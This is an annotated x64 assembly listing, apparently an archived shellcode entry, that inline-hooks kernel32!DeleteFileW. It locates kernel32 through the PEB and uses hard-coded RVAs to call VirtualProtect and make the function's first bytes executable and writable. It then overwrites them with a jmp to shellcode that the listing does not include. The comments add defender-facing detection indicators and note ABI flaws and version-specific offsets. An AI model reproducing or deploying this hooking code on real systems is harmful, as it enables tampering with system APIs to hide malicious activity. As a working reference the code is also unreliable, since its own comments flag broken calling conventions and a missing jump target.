Windows/x64 - DeleteFile() API Hooking Shellcode

;-----------------------------------------------------------------------
; Inline hook of kernel32!DeleteFileW (Windows x64, Intel syntax).
; Locates kernel32's base by walking PEB->Ldr->InMemoryOrderModuleList,
; then adds two hard-coded RVAs (VirtualProtect, DeleteFileW).  Those
; RVAs belong to one specific kernel32.dll build, so the listing is not
; portable across Windows versions.  From a defender's view the
; observable events are a VirtualProtect call that makes a kernel32 code
; page writable/executable (0x40) and the export's first bytes being
; replaced with a near-jmp opcode (0xE9) — both are classic inline-hook
; indicators for prologue integrity checks and memory-protection telemetry.
; Register roles: rdi = kernel32 base, rsi = VirtualProtect,
; r12 = DeleteFileW, r14 = stack slot holding lpflOldProtect.
; The label `shellcode` jumped to at the end is not part of this listing.
;-----------------------------------------------------------------------
xor rdx,rdx             ; rdx = 0 (index for the gs: load, and a zero source below)
mov rax,[gs:rdx+0x60]   ; rax = TEB->ProcessEnvironmentBlock (gs:[0x60])
mov rax,[rax+24]        ; rax = PEB->Ldr (offset 0x18)
mov rsi,[rax+32]        ; rsi = Ldr->InMemoryOrderModuleList.Flink (1st entry)
mov rax,[rsi]           ; 2nd entry
mov rsi,[rax]           ; 3rd entry

mov rdi,[rsi+32]        ; rdi = 3rd entry's DllBase; assumed to be kernel32.dll
                        ; (relies on module load order — nothing here verifies the name)

;---------------------------------------------------------------
xor rsi,rsi
mov si,0x29f0           ; 0x29f0 = hard-coded RVA the author used for VirtualProtect
add rsi,rdi             ; rsi = VirtualProtect (only valid for that kernel32 build)

;----------------------------------
; Hook target: same hard-coded-RVA scheme.

xor r12,r12
mov r12w,0xa2b0         ; 0x0000a2b0 = hard-coded RVA the author used for DeleteFileW
add r12,rdi             ; r12 = DeleteFileW (only valid for that kernel32 build)

;---------------------------------------------------
; Make the first 9 bytes of DeleteFileW writable:
; VirtualProtect(lpAddress=r12, dwSize=9, flNewProtect=0x40, lpflOldProtect=&slot)
mov rcx,r12             ; arg1 lpAddress = DeleteFileW
push rdx                ; rdx is still 0; pushed so it can be popped into r8 below

mov dl,9                ; arg2 dwSize = 9 (1 opcode byte + the 8-byte store done at inj:)

pop r8                  ; r8 = 0
mov r8b,0x40            ; arg3 flNewProtect = 0x40 (PAGE_EXECUTE_READWRITE)
sub rsp,4               ; 4-byte stack slot that receives the old protection value
lea r14,[rsp]           ; r14 = &slot; kept live so inj: can restore the protection
mov r9,r14              ; arg4 lpflOldProtect
call rsi                ; VirtualProtect(...)
                        ; NOTE(review): no 32-byte shadow space is reserved and `sub rsp,4`
                        ; does not keep rsp 16-byte aligned, so this call does not follow the
                        ; Microsoft x64 convention; its behaviour depends on the stack state at entry.

;--------------------------------------------------------
mov [r12],byte 0xe9     ; overwrite DeleteFileW's first byte with the jmp rel32 opcode
jmp shellcode           ; continues in code outside this listing; inj: below expects to be
                        ; reached via a call from there (return address on the stack)
  
inj:                    ; entered via call (assumed — the caller is not in this listing),
                        ; so the return address on the stack is the hook's landing address
pop rdx                 ; rdx = return address = where the patched jmp must land
sub rdx,r12
sub rdx,5               ; rdx = target - (DeleteFileW + 5): rel32 displacement of a 5-byte jmp
mov [r12+1],rdx         ; 8-byte store (rdx is 64-bit): bytes 1..8 after the opcode are
                        ; overwritten, not just the 4 displacement bytes — hence dwSize 9

; Restore the page protection saved by the first VirtualProtect call:
; VirtualProtect(lpAddress=r12, dwSize=9, flNewProtect=old, lpflOldProtect=&slot)
xor rdx,rdx
mov dl,9                ; arg2 dwSize = 9
mov rcx,r12             ; arg1 lpAddress = DeleteFileW
mov r8d,dword [r14]     ; arg3 flNewProtect = old protection stored in the stack slot
mov r9,r14              ; arg4 lpflOldProtect = the same slot

call rsi                ; VirtualProtect(...) — same ABI caveats as the first call
add rsp,4               ; release the 4-byte slot
ret                     ; returns to whatever return address was on the stack when the
                        ; listing was entered (not visible here)
  
  




